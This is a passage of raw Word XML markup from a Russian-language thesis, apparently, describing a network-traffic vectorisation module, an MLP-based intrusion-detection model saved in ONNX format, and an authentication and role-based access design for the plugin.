        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F53809" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00F91A8A" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21739F7E" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:hanging="142"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2980C9CF" wp14:editId="171AB9DC">
            <wp:extent cx="6318570" cy="2828925"/>
            <wp:effectExtent l="19050" t="19050" r="25400" b="9525"/>
            <wp:docPr id="145721813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25543" cy="2832047"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBA5FBD" w14:textId="1DA2B0CB" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">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D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidRPr="00F91A8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Диаграмма последовательности работы модуля векторизации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F7D3FD" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="298C7457" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C17402">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Таким образом, разработанный модуль векторизации решает задачу преобразования разнородных данных сетевого трафика в формат, пригодный для обработки искусственной нейронной сетью. Ключевой особенностью предложенного подхода является возможность формирования информативного профиля соединения на основе метаданных</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C17402">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>без необходимости расшифровки полезной нагрузки. Это обеспечивает соблюдение конфиденциальности передаваемой информации и снижает вычислительную нагрузку на систему обнаружения вторжений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5808DF" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="180152EF" w14:textId="77777777" w:rsidR="00812517" w:rsidRDefault="00812517" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28590FA1" w14:textId="472A8F24" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00230C61">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc231673286"/>
      <w:r w:rsidRPr="005135C4">
        <w:lastRenderedPageBreak/>
        <w:t>2.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C32B3">
        <w:t>Разработка нейросетевой модели для детектирования атак, направленных на нарушение конфиденциальности и доступности информации</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="7BB96B4D" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="005135C4" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="135664AF" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00030F60">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">На основании проведённого анализа угроз в разделе 1.2 были выделены наиболее актуальные классы атак, требующие применения интеллектуальных методов обнаружения. К ним относятся угрозы нарушения доступности (УБИ.140 — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00030F60">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00030F60">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-атаки, УБИ.153 — ботнеты) и угрозы нарушения конфиденциальности (УБИ.116 — перехват данных, УБИ.167 — заражение через веб-ресурсы). Для детектирования данных угроз была разработана специализированная нейросетевая модель, использующая на вход векторизованные метаданные сетевого трафика, сформированные модулем, описанным в разделе 2.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535ED46A" w14:textId="7CC51575" w:rsidR="002A0DB3" w:rsidRPr="002A0DB3" w:rsidRDefault="002A0DB3" w:rsidP="002A0DB3">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0DB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Многослойный персептрон (MLP) был выбран в качестве базовой архитектуры по ряду причин. Во-первых, векторизованные метаданные сетевых потоков представляют собой табличные данные фиксированной размерности, для которых MLP демонстрирует высокую эффективность без избыточной вычислительной нагрузки. Во-вторых, архитектура обеспечивает малое время </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>обработки</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0DB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, что критически важно при анализе трафика в режиме реального времени. Возможность расширения до LSTM предусмотрена для случаев, когда необходимо учитывать временную зависимость между последовательными событиями — например при обнаружении медленных распределённых атак.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66535ECD" w14:textId="7268FA36" w:rsidR="002A0DB3" w:rsidRDefault="002A0DB3" w:rsidP="00816679">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0DB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Обученная модель сохраняется в формате ONNX</w:t>
      </w:r>
      <w:r w:rsidR="00191A78" w:rsidRPr="00191A78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [1</w:t>
      </w:r>
      <w:r w:rsidR="000C2219" w:rsidRPr="000C2219">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00191A78" w:rsidRPr="00191A78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0DB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0DB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ткрытый обмен нейронными сетями), что обеспечивает независимость от фреймворка машинного обучения и позволяет выполнять </w:t>
      </w:r>
      <w:r w:rsidR="00191A78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">работу </w:t>
      </w:r>
      <w:r w:rsidRPr="002A0DB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>на любой платформе без установки дополнительных зависимостей. Параметры нормализации входных данных сохраняются отдельно и применяются к каждому входному вектору перед подачей в модель, что гарантирует корректность классификации независимо от абсолютных значений признаков конкретной сети.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516868A3" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00816679">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E25DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Для детализации процесса принятия решений был разработан алгоритм прохождения данных через слои нейронной сети в режиме реального времени. В отличие от этапа обучения, где происходит коррекция весов, на этапе эксплуатации модель выполняет только прямое распространение сигнала</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D830F5B" w14:textId="6ED9ACDF" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00327A44">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Последовательность вычислений при классификации одного сетевого события представлена на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00327A44">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D6C135" w14:textId="77777777" w:rsidR="005C39E4" w:rsidRDefault="005C39E4" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17F0DD3E" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="004F5177" w:rsidRDefault="008E0171" w:rsidP="008E0171">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1C9E5C33" wp14:editId="297A3094">
            <wp:extent cx="6156418" cy="6254160"/>
            <wp:effectExtent l="19050" t="19050" r="15875" b="13335"/>
            <wp:docPr id="209694663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46631" name="Рисунок 2096946631"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6168195" cy="6266124"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3AB7AF" w14:textId="0BD7F90D" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="005C39E4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00327A44">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00327A44">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Диаграмма </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>последовательности</w:t>
      </w:r>
      <w:r w:rsidRPr="00327A44">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> процесса классификации сетевого трафика</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A5989A" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C02F97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Процесс классификации начинается с получения вектора от модуля векторизации. Данные последовательно проходят через скрытые слои сети, где на каждом этапе применяется функция активации. На выходе формируется вероятность принадлежности события к классу «атака», которая сравнивается с пороговым значением для принятия итогового решения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DC3898" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0073E13C" w14:textId="08E1D11A" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00230C61">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc231673287"/>
      <w:r w:rsidRPr="00CB752E">
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB752E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB752E">
        <w:t xml:space="preserve">Обеспечение защиты данных в архитектуре нейросетевого </w:t>
      </w:r>
      <w:r>
        <w:t>модуля</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="78946F3E" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="717CA36B"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D249F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для обеспечения комплексной защиты разработана многоуровневая модель безопасности, включающая механизмы аутентификации, разграничения прав доступа, контроля целостности и криптографической защиты.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A26966F" w14:textId="2216A7C5" w:rsidR="00B94753" w:rsidRPr="00D249F3" w:rsidRDefault="00B94753" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Каждый из перечисленных механизмов направлен на нейтрализацию конкретных угроз, определённых в модели угроз раздела 1.2. В совокупности они обеспечивают защиту как от внешних атак на интерфейс плагина, так и от внутренних угроз со стороны привилегированных пользователей.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55963C07" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00D249F3" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D249F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для защиты доступа к критически важным функциям плагина выбрана многофакторная аутентификация в сочетании с ролевой моделью доступа. Ролевая модель обеспечивает минимизацию привилегий за счёт строго определённого набора разрешений для каждой роли, что снижает риск случайных или злонамеренных действий. Дополнительно все операции аутентификации и доступа подлежат обязательному логированию для последующего анализа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F89B1A1" w14:textId="254F4439"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D249F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Процесс аутентификации пользователя начинается с ввода учётных данных, которые передаются в модуль аутентификации для проверки. При успешной проверке подлинности система определяет роль пользователя и выдает ему соответствующий токен доступа. Далее при каждом обращении к функциям плагина этот токен проверяется, и в зависимости от роли пользователю предоставляются только те возможности, которые разрешены его уровнем привилегий. Все попытки аутентификации, как успешные, так и неудачные, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D249F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">фиксируются в журнале аудита для последующего анализа инцидентов безопасности. </w:t>
      </w:r>
      <w:r w:rsidRPr="009B60E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Процесс аутентификации пользователя представлен на рисунке 1</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="009B60E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5401D2E9" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
